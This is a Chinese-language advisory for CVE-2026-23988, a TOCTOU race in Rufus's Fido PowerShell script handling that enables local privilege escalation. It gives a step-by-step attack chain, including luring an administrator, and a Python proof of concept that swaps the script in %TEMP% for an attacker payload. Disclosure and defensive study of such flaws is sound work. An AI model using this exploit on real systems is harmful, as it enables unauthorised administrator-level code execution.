CVE-2026-23988 | Rufus TOCTOU竞态条件导致本地管理员权限提升

漏洞信息

漏洞编号

CVE-2026-23988

漏洞类型

竞态条件（TOCTOU）/ 本地权限提升

CVSS评分

7.3 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Rufus

漏洞概述

Rufus是一款常用的USB启动盘创建工具，用于格式化和创建可启动USB闪存驱动器。该工具在处理Fido PowerShell脚本时存在严重的竞态条件（TOCTOU - Time-of-check to time-of-use）安全漏洞。攻击者可以利用文件检查与文件使用之间的时间窗口，在低权限用户环境下以管理员权限执行任意代码。由于Rufus需要以管理员权限运行以完成USB格式化操作，但同时会将脚本写入标准用户可写的%TEMP%临时目录，且在文件操作过程中未实施任何文件锁定机制，这为本地攻击者提供了权限提升的机会。该漏洞的CVSS评分为7.3，属于高危漏洞，成功利用可导致系统完全沦陷。

技术细节

漏洞根源在于src/net.c文件中的Fido PowerShell脚本处理流程存在TOCTOU竞态条件。具体来说，Rufus在创建、验证和执行脚本的过程中存在以下问题：

1. 文件写入阶段：Rufus以管理员权限运行，但将脚本文件写入%TEMP%目录，该目录默认对所有标准用户具有写权限。

2. 验证与执行间隙：程序在写入脚本后、执行前存在时间窗口，期间未对文件进行锁定或完整性校验。

3. 攻击者利用方式：本地低权限攻击者可通过监控%TEMP%目录，在合法脚本写入后、执行前的瞬间，使用恶意脚本替换目标文件。

4. 权限提升结果：由于Rufus以管理员权限执行被替换的恶意脚本，攻击代码将以SYSTEM或Administrator权限运行，实现本地权限提升。

此漏洞属于经典的检查-使用竞态条件，攻击成功需要攻击者具有本地访问权限并能进行文件监控和快速替换操作。攻击复杂度为中等，需要精确的时序控制。

攻击链分析

STEP 1

步骤1

攻击者以低权限用户身份登录目标Windows系统，该用户对%TEMP%目录具有写入权限

STEP 2

步骤2

部署PoC脚本开始监控%TEMP%目录，检测Rufus创建的Fido PowerShell脚本文件

STEP 3

步骤3

诱骗具有管理员权限的用户在系统上运行Rufus并触发Fido功能（UEFI启动盘创建）

STEP 4

步骤4

Rufus以管理员权限在%TEMP%目录下创建合法的Fido PowerShell脚本

STEP 5

步骤5

攻击者检测到脚本创建，在Rufus执行前快速使用恶意脚本替换原文件

STEP 6

步骤6

Rufus继续执行脚本，此时执行的是攻击者植入的恶意代码，以管理员权限运行

STEP 7

步骤7

恶意代码以SYSTEM或Administrator权限执行，完成权限提升，可执行任意命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-23988 PoC - Rufus TOCTOU Race Condition
# Target: Rufus <= 4.11 on Windows
# This PoC demonstrates the race condition by monitoring and replacing the Fido script

import os
import time
import shutil
import threading
import subprocess

TEMP_DIR = os.environ.get('TEMP', 'C:\\Users\\Public\\AppData\\Local\\Temp')
FIDOSCRIPT_NAME = 'rufus_fido_script.ps1'
MALICIOUS_SCRIPT = '''
# Malicious payload - executes with Administrator privileges
# Add your payload here
$payload = "whoami > C:\\\\temp\\\\pwned.txt"
Invoke-Expression $payload
'''

def monitor_and_replace():
    """Monitor TEMP directory and replace the Fido script with malicious one"""
    target_path = os.path.join(TEMP_DIR, FIDOSCRIPT_NAME)
    
    print(f"[*] Monitoring {TEMP_DIR} for {FIDOSCRIPT_NAME}...")
    
    while True:
        if os.path.exists(target_path):
            try:
                # Wait for file to be fully written
                time.sleep(0.1)
                
                # Replace with malicious script
                with open(target_path, 'w') as f:
                    f.write(MALICIOUS_SCRIPT)
                
                print("[+] Script replaced successfully!")
                print("[+] Payload will execute with Administrator privileges")
                break
            except PermissionError:
                # File still locked, retry
                continue
        time.sleep(0.05)

def main():
    print("=" * 60)
    print("CVE-2026-23988 - Rufus TOCTOU Race Condition PoC")
    print("=" * 60)
    print("\n[!] This PoC requires:")
    print("    1. Rufus running with Administrator privileges")
    print("    2. Low-privilege user access to the system")
    print("    3. User interaction to trigger Fido script creation")
    print("\n[*] Starting monitor thread...")
    
    # Start monitoring in background thread
    monitor_thread = threading.Thread(target=monitor_and_replace, daemon=True)
    monitor_thread.start()
    
    print("[*] Monitor running. Waiting for Rufus to create script...")
    print("[*] PoC ready - integrate with actual Rufus execution")
    
    # Keep thread alive
    monitor_thread.join(timeout=300)

if __name__ == "__main__":
    main()

影响范围

Rufus < 4.12_BETA

Rufus <= 4.11

防御指南

临时缓解措施

作为临时缓解措施，在不需要使用Rufus的UEFI/Fido功能时，可考虑以非管理员权限运行Rufus（但这可能限制其完整功能）。同时，应限制对%TEMP%目录的访问控制，确保标准用户无法监控或修改该目录下的文件。此外，在多用户环境中应提高警惕，避免在共享系统上使用Rufus创建可启动介质。最根本的解决方案是等待并部署官方发布的4.12_BETA版本更新。